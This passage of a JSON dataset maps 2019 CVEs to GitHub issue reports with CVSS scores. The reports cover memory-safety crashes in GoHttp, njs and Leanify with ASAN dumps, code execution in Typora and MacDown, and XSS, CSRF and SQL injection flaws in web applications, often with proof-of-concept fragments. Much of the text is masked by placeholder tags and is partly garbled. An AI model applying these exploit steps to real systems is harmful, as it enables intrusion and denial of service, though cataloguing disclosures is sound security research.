represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  35148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35149. "severity": "HIGH",
  35150. "baseScore": 7.5,
  35151. "impactScore": 3.6,
  35152. "exploitabilityScore": 3.9
  35153. },
  35154. {
  35155. "CVE_ID": "CVE-2019-12160",
  35156. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/15",
  35157. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/15",
  35158. "Repo_new": "fekberg/gohttp",
  35159. "Issue_Created_At": "2019-05-17T06:04:40Z",
  35160. "description": "Heap Use After Free Notification when compiling with ASAN on Ubuntu NUMBERTAG GCC NUMBERTAG Steps to reproduce: Compile APITAG Server (GCC and ASAN flags/LIBS). Screen S server cd APITAG APITAG CTRL A, D APITAG from session) Screen S Request curl FILETAG CTRL A, D Screen R server Dump NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dc0 at pc NUMBERTAG ff1c4d NUMBERTAG b bp NUMBERTAG f fe6d5acce0 sp NUMBERTAG ffe6d5ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dc0 thread T NUMBERTAG ff1c4d NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG d9c in APITAG ( PATHTAG NUMBERTAG bc in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG dc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff1c4d7e2ca in __interceptor_free ( PATHTAG NUMBERTAG d in APITAG ( PATHTAG NUMBERTAG f2 in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG ff1c4d7e NUMBERTAG in malloc ( PATHTAG NUMBERTAG f3a in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG",
  35161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35162. "severity": "CRITICAL",
  35163. "baseScore": 9.8,
  35164. "impactScore": 5.9,
  35165. "exploitabilityScore": 3.9
  35166. },
  35167. {
  35168. "CVE_ID": "CVE-2019-12172",
  35169. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2166",
  35170. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2166",
  35171. "Repo_new": "typora/typora-issues",
  35172. "Issue_Created_At": "2019-02-07T20:05:43Z",
  35173. "description": "Typora Version NUMBERTAG Remote Code Execution Vulnerability. Typora Version NUMBERTAG Remote Code Execution Vulnerability Description: Typora fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora APITAG Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability APITAG Tested On: APITAG NUMBERTAG Ubuntu NUMBERTAG Windows NUMBERTAG Proof of Concepts: APITAG CODETAG Windows: CODETAG Linux: CODETAG FILETAG",
  35174. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35175. "severity": "HIGH",
  35176. "baseScore": 7.8,
  35177. "impactScore": 5.9,
  35178. "exploitabilityScore": 1.8
  35179. },
  35180. {
  35181. "CVE_ID": "CVE-2019-12173",
  35182. "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1050",
  35183. "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1050",
  35184. "Repo_new": "macdownapp/macdown",
  35185. "Issue_Created_At": "2019-01-28T02:45:54Z",
  35186. "description": "Macdown Version NUMBERTAG Remote Code Execution. Macdown Version NUMBERTAG Remote Code Execution Macdown version NUMBERTAG is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the APITAG Calculator.app when opened inside of Macdown. APITAG APITAG ERRORTAG Screenshot: APITAG FILETAG",
  35187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35188. "severity": "HIGH",
  35189. "baseScore": 8.8,
  35190. "impactScore": 5.9,
  35191. "exploitabilityScore": 2.8
  35192. },
  35193. {
  35194. "CVE_ID": "CVE-2019-12198",
  35195. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/18",
  35196. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/18",
  35197. "Repo_new": "fekberg/gohttp",
  35198. "Issue_Created_At": "2019-05-19T18:57:53Z",
  35199. "description": "stack buffer overflow NUMBERTAG characters in User Agent string causes stack overflow.. APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG curl A APITAG localhost NUMBERTAG APITAG APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG APITAG Settings: Port NUMBERTAG Server root: PATHTAG Configuration file: APITAG Logfile: .log Deamon NUMBERTAG APITAG APITAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG bd NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG bae0 sp NUMBERTAG fff NUMBERTAG b NUMBERTAG APITAG APITAG APITAG APITAG READ of size NUMBERTAG at NUMBERTAG fff NUMBERTAG bd NUMBERTAG thread T0 APITAG APITAG NUMBERTAG f3f ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG cbc ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG ca NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG ) APITAG APITAG NUMBERTAG fff NUMBERTAG bd NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame APITAG APITAG NUMBERTAG f ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG apos;buffer&apos; (line NUMBERTAG APITAG APITAG &lt;== Memory access at offset NUMBERTAG overflows this variable APITAG APITAG HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions are supported) SUMMARY: APITAG stack buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG NUMBERTAG gt NUMBERTAG a NUMBERTAG APITAG APITAG f3 APITAG APITAG ] APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: APITAG APITAG fa APITAG APITAG Freed heap region: APITAG APITAG fd APITAG APITAG Stack left redzone: APITAG APITAG f1 APITAG APITAG Stack mid redzone: APITAG APITAG f2 APITAG APITAG Stack right redzone: APITAG APITAG f3 APITAG APITAG Stack after return: APITAG APITAG f5 APITAG APITAG Stack use after scope: APITAG APITAG f8 APITAG APITAG Global redzone: APITAG APITAG f9 APITAG APITAG Global init order: APITAG APITAG f6 APITAG APITAG Poisoned by user: APITAG APITAG f7 APITAG APITAG Container overflow: APITAG APITAG fc APITAG APITAG Array cookie: APITAG APITAG ac APITAG APITAG Intra object redzone: APITAG APITAG bb APITAG APITAG APITAG internal: APITAG APITAG fe APITAG APITAG Left alloca redzone: APITAG APITAG ca APITAG APITAG Right alloca redzone: APITAG APITAG cb APITAG APITAG NUMBERTAG ABORTING APITAG",
  35200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35201. "severity": "HIGH",
  35202. "baseScore": 7.5,
  35203. "impactScore": 3.6,
  35204. "exploitabilityScore": 3.9
  35205. },
  35206. {
  35207. "CVE_ID": "CVE-2019-12206",
  35208. "Issue_Url_old": "https://github.com/nginx/njs/issues/162",
  35209. "Issue_Url_new": "https://github.com/nginx/njs/issues/162",
  35210. "Repo_new": "nginx/njs",
  35211. "Issue_Created_At": "2019-05-20T08:18:34Z",
  35212. "description": "heap buffer overflow in nxt_utf8_encode APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG APITAG testcase (b NUMBERTAG CODETAG Valgrind output: ERRORTAG",
  35213. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35214. "severity": "CRITICAL",
  35215. "baseScore": 9.8,
  35216. "impactScore": 5.9,
  35217. "exploitabilityScore": 3.9
  35218. },
  35219. {
  35220. "CVE_ID": "CVE-2019-12207",
  35221. "Issue_Url_old": "https://github.com/nginx/njs/issues/168",
  35222. "Issue_Url_new": "https://github.com/nginx/njs/issues/168",
  35223. "Repo_new": "nginx/njs",
  35224. "Issue_Created_At": "2019-05-20T09:01:01Z",
  35225. "description": "heap buffer overflow in nxt_utf8_decode APITAG Testcase (in base NUMBERTAG CODETAG njs version: APITAG Stack trace (from ASAN): ERRORTAG Found by fluff URLTAG",
  35226. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35227. "severity": "CRITICAL",
  35228. "baseScore": 9.8,
  35229. "impactScore": 5.9,
  35230. "exploitabilityScore": 3.9
  35231. },
  35232. {
  35233. "CVE_ID": "CVE-2019-12208",
  35234. "Issue_Url_old": "https://github.com/nginx/njs/issues/163",
  35235. "Issue_Url_new": "https://github.com/nginx/njs/issues/163",
  35236. "Repo_new": "nginx/njs",
  35237. "Issue_Created_At": "2019-05-20T08:30:18Z",
  35238. "description": "heap buffer overflow in njs_function_native_call APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG ASAN log: ERRORTAG",
  35239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35240. "severity": "CRITICAL",
  35241. "baseScore": 9.8,
  35242. "impactScore": 5.9,
  35243. "exploitabilityScore": 3.9
  35244. },
  35245. {
  35246. "CVE_ID": "CVE-2019-12215",
  35247. "Issue_Url_old": "https://github.com/matomo-org/matomo/issues/14464",
  35248. "Issue_Url_new": "https://github.com/matomo-org/matomo/issues/14464",
  35249. "Repo_new": "matomo-org/matomo",
  35250. "Issue_Created_At": "2019-05-20T08:54:18Z",
  35251. "description": "Full Path Disclosure. A full path disclosure vulnerability was discovered in Matomo APITAG where a user can trigger a particular error to discover the full path of Matomo on the disk. PAYLOAD URLTAG APITAG RESULT: Neither the property APITAG nor one of the methods APITAG APITAG or APITAG exist and have public access in class PATHTAG in PATHTAG line NUMBERTAG",
  35252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  35253. "severity": "MEDIUM",
  35254. "baseScore": 4.3,
  35255. "impactScore": 1.4,
  35256. "exploitabilityScore": 2.8
  35257. },
  35258. {
  35259. "CVE_ID": "CVE-2019-12250",
  35260. "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/3279",
  35261. "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/3279",
  35262. "Repo_new": "identityserver/identityserver4",
  35263. "Issue_Created_At": "2019-05-21T07:00:37Z",
  35264. "description": "XSS in the APITAG Hi, FILETAG in the APITAG method the PARAM APITAG is not filtered, and can be injected with XSS payload APITAG in which can be triggered from the log as well. static APITAG APITAG APITAG { var request = APITAG var result = Log APITAG APITAG => APITAG h => APITAG APITAG true) APITAG APITAG APITAG APITAG if APITAG result = APITAG APITAG => APITAG v => APITAG return result; }",
  35265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35266. "severity": "MEDIUM",
  35267. "baseScore": 6.1,
  35268. "impactScore": 2.7,
  35269. "exploitabilityScore": 2.8
  35270. },
  35271. {
  35272. "CVE_ID": "CVE-2019-12253",
  35273. "Issue_Url_old": "https://github.com/ilosuna/mylittleforum/issues/468",
  35274. "Issue_Url_new": "https://github.com/my-little-forum/mylittleforum/issues/468",
  35275. "Repo_new": "my-little-forum/mylittleforum",
  35276. "Issue_Created_At": "2019-05-06T07:10:31Z",
  35277. "description": "CSRF token not present in delete posting request in admin panel | Manage posting. Application is vulnerable for CSRF as CSRF token is not sent when a delete posting request is triggered. There are two scenarios which I have observed in this request NUMBERTAG Delete request is a simple GET request : GET APITAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG DNT NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Delete request is a post request but without CSRF token. POST FILETAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG delete_posting_confirm=OK+ APITAG In both the cases application is vulnerable to CSRF, where attacker can trigger delete request when a victim clicks on a vulnerable link.",
  35278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  35279. "severity": "MEDIUM",
  35280. "baseScore": 6.5,
  35281. "impactScore": 3.6,
  35282. "exploitabilityScore": 2.8
  35283. },
  35284. {
  35285. "CVE_ID": "CVE-2019-12291",
  35286. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5888",
  35287. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5888",
  35288. "Repo_new": "hashicorp/consul",
  35289. "Issue_Created_At": "2019-05-22T19:21:46Z",
  35290. "description": "Reserve Issue Number.",
  35291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  35292. "severity": "HIGH",
  35293. "baseScore": 7.5,
  35294. "impactScore": 3.6,
  35295. "exploitabilityScore": 3.9
  35296. },
  35297. {
  35298. "CVE_ID": "CVE-2019-12298",
  35299. "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/50",
  35300. "Issue_Url_new": "https://github.com/jayxon/leanify/issues/50",
  35301. "Repo_new": "jayxon/leanify",
  35302. "Issue_Created_At": "2019-05-20T17:43:12Z",
  35303. "description": "Fuzzing: Specially crafted input file results in repeatable crash when compiled with ASAN under Ubuntu/GCC.. I found Leanify while doing some research and decided to use Radamsa to test the robustness of the application. It appears pretty solid. I grabbed a ton of test files and then ran this simple loop to generate some more files; for i in $(ls); do cat $i | radamsa; done. I did note a few things that were interesting, the most of which was a crash noted by ASAN from mutated files that proved hard to debug. I've done the test case reduction already down from several hundred bytes to the smallest byte string I could find that still induced the crash. I did note that by modifying the length of the input file, the resulting address of the crash could be changed. Note that in the reproduction steps below, amongst the output shows the READ attempt at crash time. Another interesting crash I noted was a WRITE of NUMBERTAG bytes in another crash file. READ: root APITAG cat unknown_crash ?.W\\T NUMBERTAG APITAG ./leanify /root/test Processing: /root/test APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fec NUMBERTAG d at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fec NUMBERTAG d thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). 
SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG e0: fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG f0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Another READ: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fecc4a at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fecc4a thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). 
SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING A WRITE crash: Checksum does not match! APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fea NUMBERTAG at pc NUMBERTAG ffff6ef6bec bp NUMBERTAG fffffffe NUMBERTAG sp NUMBERTAG fffffffd8d8 WRITE of size NUMBERTAG at NUMBERTAG ffff7fea NUMBERTAG thread T NUMBERTAG ffff6ef6beb in __asan_memset ( PATHTAG NUMBERTAG b3e ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). 
SUMMARY: APITAG unknown crash NUMBERTAG asan_memset Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG b NUMBERTAG eff NUMBERTAG c NUMBERTAG eff NUMBERTAG d NUMBERTAG eff NUMBERTAG e NUMBERTAG eff NUMBERTAG f NUMBERTAG eff NUMBERTAG fe]fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING I thought about starting to add some debug statements to narrow down causes and see if the crash is exploitable, however I figured I would post something here about the crashes under ASAN. The program appears to exit far more gracefully without ASAN added.",
  35304. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35305. "severity": "MEDIUM",
  35306. "baseScore": 5.5,
  35307. "impactScore": 3.6,
  35308. "exploitabilityScore": 1.8
  35309. },
  35310. {
  35311. "CVE_ID": "CVE-2019-12312",
  35312. "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/246",
  35313. "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/246",
  35314. "Repo_new": "libreswan/libreswan",
  35315. "Issue_Created_At": "2019-05-12T13:12:55Z",
  35316. "description": "NULL pointer dereference and pluto daemon restart in Libreswan NUMBERTAG Hello, I triggered a vulnerability while testing the Libreswan NUMBERTAG IKE NUMBERTAG server. The pluto IKE daemon will restart (due to NULL pointer dereference when built with NSS) by sending two IKE NUMBERTAG packets which are init_IKE and delete_IKE in NUMBERTAG des_cbc mode to Libreswan server. A detailed interactive process is as follows: First, send the first init_IKE message to the server. The server replies the init_IKE message to the client. Then send a delete_IKE message (encrypted) to the server. The server tries to respond INVALID_IKE_SPI to the client, but an exception occurred while preparing to encrypt the message. detailed packets CODETAG Relevant log ERRORTAG My APITAG ERRORTAG Looking forward to your reply, thank you.",
  35317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35318. "severity": "HIGH",
  35319. "baseScore": 7.5,
  35320. "impactScore": 3.6,
  35321. "exploitabilityScore": 3.9
  35322. },
  35323. {
  35324. "CVE_ID": "CVE-2019-12348",
  35325. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/1",
  35326. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/1",
  35327. "Repo_new": "cby234/zzcms",
  35328. "Issue_Created_At": "2019-05-20T08:05:21Z",
  35329. "description": "zzcms NUMBERTAG SQL injection Vulnerability. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG When we start 'modify' logic we can see 'daohang' var receive $_POST FILETAG We can find ' value in update query it means ' value after 'daohang' parameter does not mean any more. FILETAG FILETAG After 'daohang' parameter 'bannerbg' will appear and if we check about 'bannerbg' parameter we can't find any other security filter. So we can inject any query via 'bannerbg' parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : update SQL injection APITAG a FILETAG FILETAG POC2 : Time based Blind SQL injection APITAG a FILETAG",
  35330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35331. "severity": "CRITICAL",
  35332. "baseScore": 9.8,
  35333. "impactScore": 5.9,
  35334. "exploitabilityScore": 3.9
  35335. },
  35336. {
  35337. "CVE_ID": "CVE-2019-12349",
  35338. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/2",
  35339. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/2",
  35340. "Repo_new": "cby234/zzcms",
  35341. "Issue_Created_At": "2019-05-20T08:47:25Z",
  35342. "description": "zzcms NUMBERTAG FILETAG SQL injection. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG Let's look at SQL query part FILETAG If index of , value is not NUMBERTAG sql will be (/ if(strpos($id NUMBERTAG line NUMBERTAG select from zzcms_dl where saver APITAG '' and id in (\". $id .\")\" There is no single quote for id parameter. So We can inject any sql in id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : Union SQL injection APITAG union select APITAG a, FILETAG",
  35343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35344. "severity": "CRITICAL",
  35345. "baseScore": 9.8,
  35346. "impactScore": 5.9,
  35347. "exploitabilityScore": 3.9
  35348. },
  35349. {
  35350. "CVE_ID": "CVE-2019-12350",
  35351. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/4",
  35352. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/4",
  35353. "Repo_new": "cby234/zzcms",
  35354. "Issue_Created_At": "2019-05-22T07:15:10Z",
  35355. "description": "APITAG Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
  35356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35357. "severity": "CRITICAL",
  35358. "baseScore": 9.8,
  35359. "impactScore": 5.9,
  35360. "exploitabilityScore": 3.9
  35361. },
  35362. {
  35363. "CVE_ID": "CVE-2019-12351",
  35364. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/3",
  35365. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/3",
  35366. "Repo_new": "cby234/zzcms",
